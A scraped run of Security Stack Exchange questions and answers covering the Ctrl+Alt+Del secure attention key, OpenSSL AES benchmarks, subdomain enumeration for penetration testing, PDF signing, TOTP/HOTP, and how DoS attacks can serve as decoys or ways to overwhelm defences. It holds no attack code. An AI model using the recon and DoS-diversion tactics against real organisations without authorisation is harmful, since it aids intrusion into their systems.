This combination is called a Secure attention key . The Windows kernel is "wired" to notify Winlogon and nobody else about this combination. In this way, when you press Ctrl + Alt + Del , you can be sure † that you're typing your password in the real login form and not some other fake process trying to steal your password. For example, an application which looks exactly like the windows login. In Linux, there's a loosely-defined equivalent which is Ctrl + Alt + Pause . However, it doesn't exactly do the same thing. It kills everything except where you're trying to input your password. So far, there's no actual equivalent that would work when running X . † This implies a trust in the integrity of the system itself, it's still possible to patch the kernel and override this behaviour for other purposes (malicious or completely legitimate)
{ "source": [ "https://security.stackexchange.com/questions/34972", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6138/" ] }
35,036
If I run openssl 1.0.1e like this : $ ./openssl speed aes-256-cbc (i.e without EVP API) Doing aes-256 cbc for 3s on 16 size blocks: 14388425 aes-256 cbc's in 3.00s Doing aes-256 cbc for 3s on 64 size blocks: 3861764 aes-256 cbc's in 2.99s Doing aes-256 cbc for 3s on 256 size blocks: 976359 aes-256 cbc's in 3.00s Doing aes-256 cbc for 3s on 1024 size blocks: 246145 aes-256 cbc's in 2.99s Doing aes-256 cbc for 3s on 8192 size blocks: 30766 aes-256 cbc's in 3.00s However, if I run it like this : $ ./openssl speed -evp AES256 Doing aes-256-cbc for 3s on 16 size blocks: 71299827 aes-256-cbc's in 3.00s Doing aes-256-cbc for 3s on 64 size blocks: 18742055 aes-256-cbc's in 2.99s Doing aes-256-cbc for 3s on 256 size blocks: 4771917 aes-256-cbc's in 2.99s Doing aes-256-cbc for 3s on 1024 size blocks: 1199158 aes-256-cbc's in 3.00s Doing aes-256-cbc for 3s on 8192 size blocks: 150768 aes-256-cbc's in 2.99s From the OpenSSL documentation , it seems that using EVP for the same cipher or not using EVP should not make any difference. Yes I see it consistently. Can anyone please provide an insight? I have googled a lot but could not find anything. I will look through code but not sure if I can understand that part.
In OpenSSL source code, the speed aes-256-cbc function calls AES_cbc_encrypt() which itself uses AES_encrypt() , a function from crypto/aes/aes_x86core.c . It is an obvious "classical" implementation with tables. On the other hand, with EVP, you end up in the code in crypto/evp/e_aes.c which dynamically detects whether the current CPU supports the AES-NI instructions , a feature of recent x86 processors, which allow for vastly improved performance. In OpenSSL code, the AESNI_CAPABLE macro does the job (feeding on some flags which are set when the library is initialized, using CPUID ). Bottom-line: with EVP, you benefit from the automatic selection of the improved implementation, based on the current CPU model, whereas the non-EVP code directly uses the generic software implementation, which works everywhere, but is slower.
{ "source": [ "https://security.stackexchange.com/questions/35036", "https://security.stackexchange.com", "https://security.stackexchange.com/users/19872/" ] }
35,078
One of the things I need to do from time to time is to find subdomains of a site for example. Starting with example.com sub1.example.com other.example.com another.example.com I'm looking for any additional ways to perform recon on these targets and I want to get a list of all the subdomains of a domain. I'm currently doing a number of things inlcuding using maltego to crawl for info Using search engines to search for subdomains crawling site links Examining DNS records Examining incorrectly configured SSL certificates Guessing things like 'vpn.example.com' I reckon there are more than the ones i've found so far, but now I'm out of ideas.
As a pentester being able to find the subdomains for a site comes up often. So I wrote a tool, SubBrute that does this quite well if I do say so my self. In short, this is better than other tools (fierce2) in that its a lot faster, more accurate and easier to work with . This tool comes with a list of real subdomains obtained from spidering the web. This subdomain list is more than 16 times the size of fierce2 and subbrute will take about 15 minutes to exhaust this list on a home connection. The output is a clean newline separated list, that is easy to use as the input for other tools like nmap or a web application vulnerability scanner.
{ "source": [ "https://security.stackexchange.com/questions/35078", "https://security.stackexchange.com", "https://security.stackexchange.com/users/18541/" ] }
35,121
I've created a few certificates to use myself, but I find myself stumped when it comes to creating a certificate which contains a digital signature. First, how would I go about creating a standard certificate which no longer contains only common fields, but ones containing a digital signature as well. And second, how could I manually append this certificate as data to the corresponding pdf file? Thanks!
According to your comments to other answers, you actually want to sign a pdf file with [your] certificate, then have this signature saved and appended to the pdf [you]'ve just signed. (BTW, you sign with the private key associated with the public key in your certificate, not with the certificate itself, but that's a detail.) I assume you want to "append" the signature to the PDF in a way that a standard conform PDF viewer (e.g. Adobe Reader) will recognize, display, and validate as an integrated PDF signature. In that case you already started wrong by signing the original PDF as is and expecting to now have to merely somehow append that signature to the file. Instead you have to build a new revision of the PDF document which includes a PDF AcroForm signature field whose value is a signature dictionary whose /Contents entry contains the signature of the whole new revision with the exception of the /Contents entry contents. If multiple signatures are to be integrated into a PDF, this is done by means of incremental PDF updates (explicitly not by adding multiple SignerInfo structures to a single integrated CMS signature container!): This is explained quite graphically and in more detail in the Adobe document Digital Signatures in a PDF . It furthermore is specified in the PDF specification ISO 32000-1:2008 made available here by Adobe in section 12.8 Digital Signatures. Be aware, though! The specification says: A byte range digest shall be computed over a range of bytes in the file, that shall be indicated by the ByteRange entry in the signature dictionary. This range should be the entire file, including the signature dictionary but excluding the signature value itself (the Contents entry). Other ranges may be used but since they do not check for all changes to the document, their use is not recommended. This seems to allow that you first create a signature for the original PDF and then append a new revision holding that signature indicating that range of signed bytes only contains that original revision, not the extended revision without only the signature. In reality, though, PDF viewers (especially Adobe Reader) will only accept signatures which follow the recommendation that the signed range should be the entire file, including the signature dictionary but excluding the signature value itself. Newer specifications, e.g. the ETSI PAdES specification ETSI TS 102 778 (cf. section 5.1 item b in part 2 and section 4.2 item c in part 3 ) even make this recommendation officially a requirements, and so will ISO 32000-2. Depending on your programming context, there are many PDF libraries supporting the creation of integrated PDF signatures and also many products using these libraries. Some of them are even available for free subject e.g. to the AGPL.
{ "source": [ "https://security.stackexchange.com/questions/35121", "https://security.stackexchange.com", "https://security.stackexchange.com/users/25434/" ] }
35,157
Google Authenticator is an alternative to SMS for 2Step verification, installing an app on Android where the codes will be sent. It works without any connectivity; it even works on plane mode. This is what I don't get. How is it possible that it works without connectivity? How do the mobile phone and the server sync to know which code is valid at that very moment?
Google Authenticator supports both the HOTP and TOTP algorithms for generating one-time passwords. With HOTP, the server and client share a secret value and a counter, which are used to compute a one time password independently on both sides. Whenever a password is generated and used, the counter is incremented on both sides, allowing the server and client to remain in sync. TOTP essentially uses the same algorithm as HOTP with one major difference. The counter used in TOTP is replaced by the current time. The client and server remain in sync as long as the system times remain the same. This can be done by using the Network Time protocol . The secret key (as well as the counter in the case of HOTP) has to be communicated to both the server and the client at some point in time. In the case of Google Authenticator, this is done in the form of a QRCode encoded URI. See: KeyUriFormat for more information.
{ "source": [ "https://security.stackexchange.com/questions/35157", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15194/" ] }
35,160
I work for a large-ish company (thousands of employees across multiple locations). I recently needed to know what the possible public IP addresses are, so that a vendor could identify us (presumably for their firewall). The network guy I spoke with acted as if anyone knowing our range of public IP addresses is a significant security threat. A few of the IP addresses in that range are totally public, being resolved from our public web site domains. What is the real risk of having the whole world know all the possible IP addresses that you might have?
Your public facing IP address is for most intents and purposes public information. No security should be dependent on it being private, however it's not something you want to wave around willy nilly necessarily (just like you wouldn't wave your home address around) but it also isn't something that is hard for someone to find with generally minimal effort if they know what they are doing. If someone has a legit need for your IP address though, there is no reason that it should be a security red-flag. Your public IP address is disclosed to every system you talk to on the Internet by necessity.
{ "source": [ "https://security.stackexchange.com/questions/35160", "https://security.stackexchange.com", "https://security.stackexchange.com/users/25461/" ] }
35,228
I came to my computer today and have not been here since monday afternoon. I am using windows 7. There were some error messages showing even on the log in screen about memory violations done by spotify and one more (I can't remember), and I just clicked them away, even though it is not normal on my PC. Sometimes it freezes on the login screen and I have to reboot, but this was different. But I did not take a note of the messages as I just didn't care. After logging in, I noticed that my Teamviewer client was running (the GUI was showing). I thought this was odd, since I haven't been using it lately. I was a bit curious, so I checked the log. I will not include it here, as I don't know how to read it and I do not know what could identify me. It seems that it was an update leading to this, but I am not sure. Probably, but I don't like the fact that the GUI was showing with my ID and password showing. They could have silently updated it or have given me a message... So, this leads me to the question: How to figure out if someone has been using TeamViewer 8 to access my computer when I was not here? What to look for in logs and perhaps the Windows 7 event logs? And a bonus Q: Is it safe to have TeamViewer 8 running in the background at all?
Running Teamviewer isn't very secure: read here To determine who was logged in - look here: C:\Program Files\TeamViewer\VersionX\Connections_incoming.txt C:\Users\XXX\AppData\Roaming\TeamViewer\Connections.txt
{ "source": [ "https://security.stackexchange.com/questions/35228", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24081/" ] }
35,264
I'm doing some revision for an exam and I've made a note to look at how DoS attacks can be used to gain access to a system. I can't find anything online but I found a reference to the fact here . I hope one of you can enlighten me
DoS attacks can be used in several ways as part of gaining access: Overwhelming primary defenses. when you are conducting a DoS attack, the primary defense mechanisms get caught up in it too. They can be overwhelmed and as a result, they may: a) not respond appropriate b) can hang altogether c) the watchers watching them are distracted, or your efforts are lost in the DoS logs. In addition, if the primary systems are rolled over to secondary systems (which often happens) those may not be up-to-date configurations, or you could catch the roll-over in a time-gap whereby the synchronization of everything is not current. Overwhelming primary systems may expose flaws. A DoS attack may be used to expose flaws that could be exploited. Could be procedural flaws, it could be system flaws. It could be that as a result of a DoS attack you force the organization to upgrade, and during the upgrade you take that window of opportunity to exploit. The DoS attack is a decoy. Classic attack... What magicians do all the time. Watch the left hand while I steal with my right. The DoS has so much focus of the organization, secondary routes into the system (physical, social, or technical) could be undermanned, provisioned or systems can be more easily by-passed without being noticed. DoS attack could be a plant. I once heard of hacker who conducted a limited DoS attack on organization A, because he had done his research, and the CIO from organization A was very close to organization B, and both organizations were in the same general business arena. So he suspected that if he could get organization A to adopt a specific technology to thwart his rather crude DoS attack, that organization B would do the same - thinking they might be next. He was very correct, as organization B did. Why? Well the hacker had an 0day exploit in the piece of technology and he wanted to attack organization B. Secondary Route/Bridging Exploitation. An extended DoS attack that can be sustained, can force business units within the organization to move to secondary systems paths (networks) to keep critical business going. While some of these secondary paths may be well-planned and secured, many are not. For instance a business unit may stand up a wifi, or mifi device and start using it as their business network without any security infrastructure. If an attacker is actively monitoring and profiling, they may be able to capture and attack these very vulnerable paths and now you have a direct, totally unsecured bridged network into the organizations intranet.
{ "source": [ "https://security.stackexchange.com/questions/35264", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }